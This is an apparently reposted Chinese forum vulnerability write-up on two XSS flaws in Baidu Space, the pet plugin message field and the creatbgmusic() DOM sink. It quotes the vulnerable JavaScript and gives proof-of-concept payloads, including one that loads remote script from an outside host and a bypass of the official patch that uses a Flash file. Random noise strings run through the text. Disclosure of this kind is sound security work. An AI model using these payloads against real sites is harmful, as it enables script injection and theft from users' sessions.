百度空间的宠物插件对用户输入变量未经任何过滤便存储,并不经过滤输出,造成XSS.
$ i% k; }4 G7 Z8 M- P( I2 W) ^( E h- }& o/ H
1.在http://hi.baidu.com/p__z/modify/sppet中,用户可以输入留言管理,提交后,未过滤直接储存.
6 X# d5 p( P: ]" K2.在http://hi.baidu.com/ui/scripts/pet/pet.js中
( A! d) S( e! P0 c. g0 a- J4 z) \+ S6 v
将输出一段HTML:<p style="margin-top:5px"><strong>’+F[2]+"说:</strong>"+BdUtil.insertWBR(F[0], 4)+’</p> 7 ?: h& E) [( Q7 O" S5 Z- T" b
其中BdUtil.insertWBR为 * |: e Q2 I- W4 q+ ]
function(text, step) { 6 s8 W# N- v2 [) I; {4 m" p
var textarea = textAreaCache || getContainer();
3 R/ N0 ]. M; @7 d. \( Y if (!textarea) { : X2 B" K% x: r, S( z# }
return text; - h" p6 ]( J" L" S$ w( `& k
}
5 `6 \" `: K9 i! z% J4 t" z+ O8 h textarea.innerHTML = text.replace(/&/g, "&").replace(/</g, "<").replace(/>/g, ">");
8 Z0 ]: k R9 s, I+ `- a0 H, m% X% t var string = textarea.value;
4 K; q, H8 F. H; z var step = step || 5, reg = new RegExp("(\\S{" + step + "})", "gi"); 7 e# v0 s! Y( Y& J) K! n4 ]* g
var result = string.replace(/(<[^>]+>)/gi, "$1<wbr/>").replace(/(>|^)([^<]+)(<|$)/gi, function (a, b, c, d) {if (c.length < step) {return a;}return b + c.replace(reg, "$1<wbr/>") + d;}).replace(/&([^;]*)(<wbr\/?>)([^;]*);/g, "&$1$3;"); 1 J2 I7 j! R& O1 ~0 y3 m
return result; 7 g" c; m* N+ A0 {8 U
} , n0 j4 ]& b G& X6 X+ z4 t6 ^# y
在首页中,textAreaCache 和 getContainer()均不存在,故!textarea为true,未经过滤直接return text.造成XSS. 4 U4 M2 [% Y) S9 C3 e! P
测试代码:宠物留言管理处输入:<img src=# onerror=alert(/qing/)> % t0 i+ S* |& _& S# T' y9 f% N
) {. P2 j9 ~! n; h* z
二:creatbgmusic() Dom-Xss Bug
& n p7 y1 z- U2 W ], B, @4 \百度空间的Javascript Dom函数creatbgmusic()在输出变量bgmusic*没有进行过滤,导致可以通过initBlogTextForFCK()函数构造容易HTML代码,最终导致xss漏洞
* O6 `0 A' `* Q, U, U: {# E4 b7 @+ ^
" ^0 J, e2 s. i) R在http://hi.baidu.com//js/bgmusic.js?v=1.0.js 代码:
- D" c5 p" l6 \. r3 f; x; Z5 z% V( S! G; @" M9 k7 q* [, m
function creatbgmusic(murl, musicnum, IsMusicHide, IsMusicLoop, IsMusicAutoPlay, unknow, functype) {
) m; k* C( t2 w, d% i //传入的murl赋值到bgmusic1和bgmusic2中
4 e' J( `% C) X& y& G1 M //可以通过构造类似代码来闭合标签如 "><img src=2 onerror=s=document.createElement("script");s.src="http://www.80vul.com/sobb/alert.php";document.body.appendChild(s);>#1
- e# W& d) V: @! b( j% X var bgmusic1 = "<OBJECT id=phx width=100% classid=clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6 " + (IsMusicHide ? "height=45" : "") + ">" + "<PARAM NAME=\"URL\" VALUE=\"" + murl + "?t=" + Math.random() + "\">" + " <PARAM NAME=\"rate\" VALUE=\"1\">" + " <PARAM NAME=\"balance\" VALUE=\"0\">" + " <PARAM NAME=\"currentPosition\" VALUE=\"0\">" + " <PARAM NAME=\"defaultFrame\" VALUE=\"\">" + " <PARAM NAME=\"PlayCount\" VALUE=\"" + (IsMusicLoop ? 100 : 0) + "\">" + " <PARAM NAME=\"DisplayMode\" VALUE=\"0\">" + " <PARAM NAME=\"PreviewMode\" VALUE=\"0\">" + " <PARAM NAME=\"DisplayForeColor\" VALUE=\"16777215\">" + " <PARAM NAME=\"ShowCaptioning\" VALUE=\"0\">" + " <PARAM NAME=\"ShowControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowAudioControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowDisplay\" VALUE=\"0\">" + " <PARAM NAME=\"ShowGotoBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowStatusBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowTracker\" VALUE=\"1\">" + " <PARAM NAME=\"autoStart\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"AutoRewind\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"currentMarker\" VALUE=\"0\">" + " <PARAM NAME=\"invokeURLs\" VALUE=\"0\">" + " <PARAM NAME=\"baseURL\" VALUE=\"\">" + " <PARAM NAME=\"volume\" VALUE=\"100\">" + " <PARAM NAME=\"mute\" VALUE=\"0\">" + " <PARAM NAME=\"stretchToFit\" VALUE=\"0\">" + " <PARAM NAME=\"windowlessVideo\" VALUE=\"1\">" + " <PARAM NAME=\"enabled\" VALUE=\"1\">" + " <PARAM NAME=\"EnableFullScreenControls\" VALUE=\"0\">" + " <PARAM NAME=\"EnableTracker\" VALUE=\"1\">" + " <PARAM NAME=\"EnablePositionControls\" VALUE=\"1\">" + " <PARAM NAME=\"enableContextMenu\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionStart\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionEnd\" VALUE=\"0\">" + " <PARAM NAME=\"fullScreen\" VALUE=\"0\">" + " <PARAM NAME=\"SAMIStyle\" VALUE=\"\">" + " <PARAM NAME=\"SAMILang\" VALUE=\"\">" + " <PARAM NAME=\"SAMIFilename\" VALUE=\"\">" + " <PARAM NAME=\"captioningID\" VALUE=\"\">" + " <PARAM NAME=\"Visualizations\" VALUE=\"1\">"; 9 \6 F" o3 f- }6 I( S: z. K
if (musicnum <= 1) { u0 e! @5 |8 n' v" O8 H
bgmusic1 += " <PARAM NAME=\"uiMode\" VALUE=\"mini\">"; ]( t+ M! |: X6 G: x. X/ r
} 1 k* b" `1 |+ ]1 R7 f) l
bgmusic1 += "</OBJECT>";
1 G' X, @! \4 O. [2 p var bgmusic2 = "<EMBED src=\"" + murl + "?t=" + Math.random() + "\" width=\"100%\" " + (IsMusicHide ? "height=45" : "") + " type=\"application/x-mplayer2\" invokeurls=\"0\" autogotourl=\"false\" autostart=" + (IsMusicAutoPlay ? 1 : 0) + " loop=" + (IsMusicLoop ? 1 : 0) + " quality=\"high\""; - R' G, i P" B/ A3 H- G7 {
if (musicnum <= 1) {
8 F6 |$ g, Z/ g6 U, [+ I0 C3 g4 X bgmusic2 += "showcontrols=\"1\" showpositioncontrols=\"0\" ";
& e, I9 b. N9 T. l) _" e } , P: U% H, Z: F
bgmusic2 += "> </EMBED>"; F1 @% _( u! U9 S! O
var bgmusic3 = "<div id=\"m_bgmusic\" class=\"modbox\">\u5BF9\u4E0D\u8D77\uFF0C\u60A8\u5C1A\u672A\u5B89\u88C5windows media player\uFF0C\u65E0\u6CD5\u6B23\u8D4F\u8BE5\u7A7A\u95F4\u7684\u80CC\u666F\u97F3\u4E50\uFF0C\u8BF7\u5148<a href=\"http://www.baidu.com/s?wd=windows+media+player+%CF%C2%D4%D8&cl=3\" target=\"_blank\">\u4E0B\u8F7D\u5E76\u5B89\u88C5</a><br><br></div>"; - m; `/ n8 i9 k, |' }9 G
var bgmus = detectWMP(); ' A6 S4 `- p% p- S
if (functype == "FckMusicHelper") {
: b8 ?: N& r: ~( j8 ^# C5 U9 @ if (bgmus.installed) { ' D6 g* e3 l( [' X& a, P6 K6 u
if (bgmus.type == "IE") { ; o0 n) ?) m! M Q# Q
return bgmusic1;
0 z; i, x! e% F7 K7 b" U } else if (bgmus.type == "NS") { , W( i3 \1 j( C6 z
return bgmusic2; 9 E+ N6 ?9 N i" Q
}
1 q! j& ?* M; c2 g9 ?* \/ E! I } else {
0 {" @& V" a6 K" Y+ \" `9 q return bgmusic3; 8 x& ?( _7 Z7 d* _! E5 e
}
/ z1 a3 r+ h( }" c6 [1 a0 i2 Q0 ` } else {
- O% w( O1 B. _1 x3 I1 d if (bgmus.installed) {
; g' R/ q" \5 R. ^+ W* ^1 S6 ` //document.write 直接输出bgmusic变量 导致xss
2 F0 ?/ r6 Y) S' A R0 u. ` if (bgmus.type == "IE") { 7 z* u& S- ^2 t- t6 N7 t) n R8 c, V
document.write(bgmusic1);
: r$ C6 B/ T; {- @0 G( V } else if (bgmus.type == "NS") {
p2 G8 b4 r& x' n/ y document.write(bgmusic2); 3 ]' O j) D" Q3 \- D
}
, u) ^5 Z8 l, ~, J/ _6 x) ?" b, Q( l } else { ! q7 k( X- M3 b: ?2 f! W( }7 H% I8 k
document.write(bgmusic3); / s. a6 j& l D' K
}
. R! Y; T$ d! o, | return ""; 8 O' n: `4 n" i5 e3 {* c/ r3 s
}
1 l# ~; N- W' E( B0 q; I} + D' l# o* b" w1 p
' K7 x. N! [5 C6 R( m8 _
在看百度空间里的initBlogTextForFCK()函数,调用了creatbgmusic() ,代码如下: $ ]' E& o# B8 n5 }1 N- X
$ e' J8 S+ q( {+ X( t) `1 C; tfunction initBlogTextForFCK(){
1 ?* Y1 I5 r% F! ]/ n- O1 M//fck init music 9 O$ Q/ _# q- h3 R
if(window.Node){Node.prototype.replaceNode=function(Node){this.parentNode.replaceChild(Node,this);}}
% o, l! M# m. B) y& S5 ~$ b! gvar imgBox=document.getElementsByName(’musicName’); //取得了文章中的所有name="musicName"的标签数组
) {! s- G) M$ e- H$ G" j0 ?var isAutoPlay=true;
/ K& W: R" C% _+ b) rfor(var i=0,n=imgBox.length;i<n;i++){ //然后遍历.
' T+ m$ i7 B7 `; w/ Z8 w var img=imgBox;
' d4 b/ s3 i# Z; T% }- l9 Z if(img.getAttribute(’rel’)){ 7 D3 c) t* u" ~0 w( h0 [" f; ]
var musicSrc=img.getAttribute(’rel’); //取得标签中rel的值,赋值给musicSrc
' v) V) w5 e$ |6 M- a9 N9 I var musicDiv = document.createElement("SPAN");
( }/ ^" U, j( [7 k! u var tmp=musicSrc.substr (musicSrc.indexOf(’#’)+1, 1); //以"#"为界分割musicSrc字符串,提取自动播放的flag[tmp] : p+ [3 C( V0 t0 ?1 s" C4 u& h
8 A. f( B2 M A! A
.......................... * p- e' r3 d/ Y; C3 B8 W; D0 g
- O! v% P7 Q, Y1 D: u //直接将部分musicSrc传入creatbgmusic函数.在creatbgmusic函数直接把传入的murl赋值到bgmusic1和bgmusic2中并document.write出来.
: L* y8 ]7 v7 y$ M5 d( F var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’); ! ?8 N% s( h# X" j7 ?9 Y; f; p! ]
shtml=shtml.replace(’width=100%’,’width=200’).replace(’width="100%"’,’width=200 height=45’); img.replaceNode(musicDiv); t3 G4 x+ l/ p- Y* n7 `: E
musicDiv.innerHTML=shtml; $ K8 A3 V2 p/ s
i--;n--; : n; ?3 [+ m0 }# y
} : Z2 H& U+ t8 I, O+ y7 {# L1 i
} & X, R) `' M5 Q- T! T: i
% }) C$ a) e3 t* N O1 q- O: @2 j从上面的代码分析可以看出:在所有的参数传递中,我们没有看到过滤.百度空间的富文本编辑器的过滤模式是基于HTML语法的,不会过滤掉一个属性的值中的HTML标签.所以我们可以精心构造一个的恶意的标签,在JS进行DOM操作后引起XSS.
2 p4 u8 I( @3 m; A/ v: z+ Y 7 ~8 A/ t' t! k0 u; r1 }$ m+ F
测试方法:<img width="200" height="45" name="musicName" rel=’"><img src=2 onerror=alert(/qing/)>#1’ src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif"/>
3 c' d. g% h" h' H; k6 C" p" r5 U9 k2 g. w2 Z. D
等待官方补丁 / r, A$ f# z- I. D4 f; G
3 D1 i1 A$ `4 T; R/ V# {2 C# O' h) j$ cupdate 2010年5月13日 : o7 u5 m' E0 f
& L1 |8 `/ }& ]0 b, Z& P
官方补丁:
) k. S; C: g3 d' X
/ | U2 b2 V/ |) F1 \var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’);
! [0 W1 q: S- P# F改为: m0 m/ t0 I6 h a
var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)).replace(/[\s><()]+/g,’’),1,true,false,isAutoPlay,isAutoPlay,’FckMusicHelper’); 6 ^ q# M3 ]. p0 U) B* S1 Q e( n6 U
# W3 X1 w7 W: j8 M7 ]% I$ S
update 2010年5月13日 21:50:37
# J& E5 }8 U$ E* b; \
7 E+ h; j" j$ y$ R3 \8 Z补丁存在漏洞 没有过滤" 可以继续跨: % m7 w1 |; R8 D/ J) s
! D0 o) ~; @+ C! u+ W9 b
NEW POC: + i' E" s' i+ q1 ]: n
1 M% J2 r" \2 \6 W" F
<img width="200" height="45" _fcksavedurl=" http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" rel=’http://www.xsser.net/pz/js.swf" & [/ q' h$ Q D# K9 ], b; B
! v6 N& w& z+ d+ T
allowscriptaccess="always" type="application/x-shockwave-flash"#2’ name="musicName"/>5 E) z$ E. H5 B
. q# B$ u9 A& _, [2 c+ J |
发表于 2013-8-24 11:51:11
收藏
支持
反对